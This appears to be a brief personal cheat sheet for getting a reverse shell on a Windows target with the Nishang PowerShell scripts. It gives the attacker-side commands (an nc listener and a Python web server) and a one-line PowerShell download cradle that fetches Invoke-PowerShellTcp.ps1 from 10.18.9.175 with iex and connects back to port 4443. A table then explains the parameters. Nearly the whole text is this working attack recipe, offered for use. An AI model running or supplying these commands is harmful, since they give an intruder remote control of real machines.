PowerShell
Source of win scripts
- https://github.com/samratashok/nishang
Revers shell
On hacker machine
listener
nc -nvlp 4443
static web server
python3 -m http.server
On target machine
powershell iex (New-Object Net.WebClient).DownloadString('http://10.18.9.175:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.18.9.175 -Port 4443
| Key | Description |
|---|---|
| http://10.18.9.175:8000/ | server that deliver script |
| -IPAddress 10.18.9.175 | local/hacker machine |
| -Port 4443 | local/hacker machine |